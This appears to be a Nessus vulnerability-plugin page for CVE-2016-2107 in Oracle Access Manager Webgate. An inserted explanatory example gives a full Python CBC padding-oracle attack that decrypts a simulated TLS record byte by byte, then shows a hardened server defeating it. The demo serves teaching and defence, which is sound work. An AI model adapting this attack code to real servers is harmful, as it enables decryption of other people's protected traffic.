Oracle Access Manager Webgate Information Disclosure (July 2016 CPU)

This script is Copyright (C) 2016-2017 Tenable Network Security, Inc.


Synopsis :

An authentication management application installed on the remote host
is affected by an information disclosure vulnerability.

Description :

The version of Oracle Access Manager installed on the remote host is
affected by an information disclosure vulnerability in the Web Server
Plugin (Webgate) subcomponent due to multiple flaws in the bundled
OpenSSL library. The padding checks in the aesni_cbc_hmac_sha1_cipher()
function in file crypto/evp/e_aes_cbc_hmac_sha1.c and in the
aesni_cbc_hmac_sha256_cipher() function in file
crypto/evp/e_aes_cbc_hmac_sha256.c are reached when the connection
negotiates an AES-CBC cipher suite and the server uses AES-NI. Because a
record with malformed padding is rejected differently from a record
whose MAC check fails, a man-in-the-middle attacker can use the server
as a padding oracle and decrypt the TLS traffic it protects.
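The padding-oracle attack the description refers to, worked through as an
added example (not code from the Nessus plugin, from OpenSSL or from Oracle).
It models a TLS 1.1-style CBC record layer in which the server answers
malformed padding with one alert and a MAC failure with another, which is the
distinguishing behaviour the AES-NI code path leaked, and recovers a record
byte by byte from that difference. The keys, the sample record and the alert
names are constructed for the demo; a small Feistel cipher built on
HMAC-SHA256 stands in for AES so the script runs with the standard library,
and the attack does not depend on which block cipher is used. The "hardened"
server, which answers both failures identically, is included to show that the
same attack then finds no usable candidate and aborts.

```python
"""CBC padding oracle against a simulated TLS-style record layer (added example,
not Tenable's plugin or OpenSSL code). The "vulnerable" server models the
CVE-2016-2107 leak: malformed padding gets a different alert than a bad MAC.
A Feistel toy on HMAC-SHA256 stands in for AES (stdlib only); the attack does
not depend on the block cipher used."""
import hashlib
import hmac
import os

BLOCK, MAC_LEN = 16, 20
ENC_KEY, MAC_KEY = b"\x01" * 16, b"\x02" * 16            # constructed demo keys
SAMPLE = b"GET /protected/ HTTP/1.1\r\nCookie: session=constructed-value"  # constructed

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _feistel(key, block, rounds):
    left, right = block[:8], block[8:]
    for r in rounds:
        f = hmac.new(key, bytes([r]) + right, hashlib.sha256).digest()[:8]
        left, right = right, xor(left, f)
    return right + left  # final swap: the same loop with reversed rounds inverts it

def block_encrypt(key, block): return _feistel(key, block, range(4))
def block_decrypt(key, block): return _feistel(key, block, reversed(range(4)))

def tls_pad(data):
    # TLS padding: padding_length byte, preceded by that many copies of itself
    p = BLOCK - 1 - len(data) % BLOCK
    return data + bytes([p]) * (p + 1)

def tls_unpad(data):
    # Payload without padding, or None if the padding is malformed
    p = data[-1]
    if p + 1 > len(data) or data[-(p + 1):] != bytes([p]) * (p + 1):
        return None
    return data[:-(p + 1)]

def encrypt_record(plaintext):
    # IV || CBC(plaintext || HMAC-SHA1 tag || padding), TLS 1.1+ layout
    padded = tls_pad(plaintext + hmac.new(MAC_KEY, plaintext, hashlib.sha1).digest())
    iv = os.urandom(BLOCK)
    out, prev = [iv], iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(ENC_KEY, xor(padded[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def make_server(vulnerable):
    # Oracle: maps a record to the alert the server would send back
    def handle(record):
        iv, ct = record[:BLOCK], record[BLOCK:]
        pt, prev = b"", iv
        for i in range(0, len(ct), BLOCK):
            pt += xor(block_decrypt(ENC_KEY, ct[i:i + BLOCK]), prev)
            prev = ct[i:i + BLOCK]
        body = tls_unpad(pt)
        if body is None:  # the leak: bad padding is reported unlike a bad MAC
            return "record_overflow" if vulnerable else "bad_record_mac"
        if not hmac.compare_digest(body[-MAC_LEN:], hmac.new(MAC_KEY, body[:-MAC_LEN], hashlib.sha1).digest()):
            return "bad_record_mac"
        return "ok"
    return handle

def recover_block(oracle, prev_block, target):
    """Recover one plaintext block by sending forged_iv || target records. The server
    XORs D_k(target) with the forged IV, so byte i from the end is found by forcing
    the i-1 bytes after it to decrypt as i-1 and searching for the guess that makes
    byte i decrypt as i-1 too (a valid TLS padding of length i-1)."""
    inter = bytearray(BLOCK)  # D_k(target), learned right to left
    for i in range(1, BLOCK + 1):
        pad_val = i - 1
        forged = bytearray(BLOCK)
        for j in range(1, i):
            forged[-j] = inter[-j] ^ pad_val
        hits = []
        for guess in range(256):
            forged[-i] = guess
            if oracle(bytes(forged) + target) == "record_overflow":
                continue
            if i == 1:
                # 0x01 0x01 at the end is valid padding too; re-query with
                # byte -2 changed to rule out that accidental match
                probe = bytearray(forged)
                probe[-2] ^= 0xFF
                if oracle(bytes(probe) + target) == "record_overflow":
                    continue
            hits.append(guess)
        if len(hits) != 1:  # a hardened server accepts every guess: no leak
            raise ValueError(f"{len(hits)} candidates for byte -{i}: no usable oracle")
        inter[-i] = hits[0] ^ pad_val
    return xor(bytes(inter), prev_block)

def run_attack(vulnerable):
    # Plaintext recovered by the MITM, or None when the server does not leak
    record = encrypt_record(SAMPLE)
    oracle = make_server(vulnerable)
    blocks = [record[i:i + BLOCK] for i in range(0, len(record), BLOCK)]
    try:
        recovered = b"".join(recover_block(oracle, blocks[k - 1], blocks[k])
                             for k in range(1, len(blocks)))
    except ValueError:
        return None
    return recovered[:len(SAMPLE)]
```

`run_attack(True)` returns the full sample record after roughly 256 oracle
queries per byte, while `run_attack(False)` returns None because every guess
looks identical to the attacker. The confirmation query for the last byte
matters in practice: a last byte that happens to decrypt to 0x01 next to
another 0x01 is also valid TLS padding, and an attack that skips the re-check
will occasionally recover a wrong byte and then fail on every later one.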

See also :

http://www.nessus.org/u?e49b75d6

Solution :

Apply the appropriate patches according to the July 2016 Oracle
Critical Patch Update advisory.

Risk factor :

Low / CVSS Base Score : 2.6
(CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N)

Family: Misc.

Nessus Plugin ID: 93121

Bugtraq ID: 89760

CVE ID: CVE-2016-2107